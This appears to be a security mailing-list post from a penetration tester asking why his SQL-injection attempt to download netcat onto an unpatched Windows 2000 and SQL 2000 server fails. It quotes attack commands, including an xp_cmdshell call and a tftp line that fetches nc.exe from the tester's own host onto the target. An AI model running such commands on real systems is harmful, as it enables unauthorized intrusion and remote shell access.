TFTP and XP_CMDSHELL - Weird

["Andres Molinetti" <andymolinetti () hotmail com>]

Hi, I am testing a Web App vulnerable to SQL Injection.
It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
No firewall whatsoever.

While trying to use the xp_cmdshell to upload nc.exe from my tftpd server to 
the Webserver, I experienced some problems.

I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.

As administrator (using a windows cmd.exe shell) I ran "tftp -i myHost GET 
nc.exe c:\nc.exe". File is downloaded.

When I tried it through the wep app it failed. I tried directly through SQL 
Query Analizer and it also failed.

SQL is running as a low priviledged account (sqlsvc)...

Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GET nc.exe 
c:\nc.exe" and  IT FAILED.!!

Besides, through xp_cmdshell I was able to ping my SERVER and connect to any 
port on it..I can easily deduce that the problem is the TFTP client 
(tftp.exe), no the xp_cmdshell stored procedure...

Any Ideas?

_________________________________________________________________
Moda para esta temporada. Ponte al día de todas las tendencias. 
http://www.msn.es/Mujer/moda/default.asp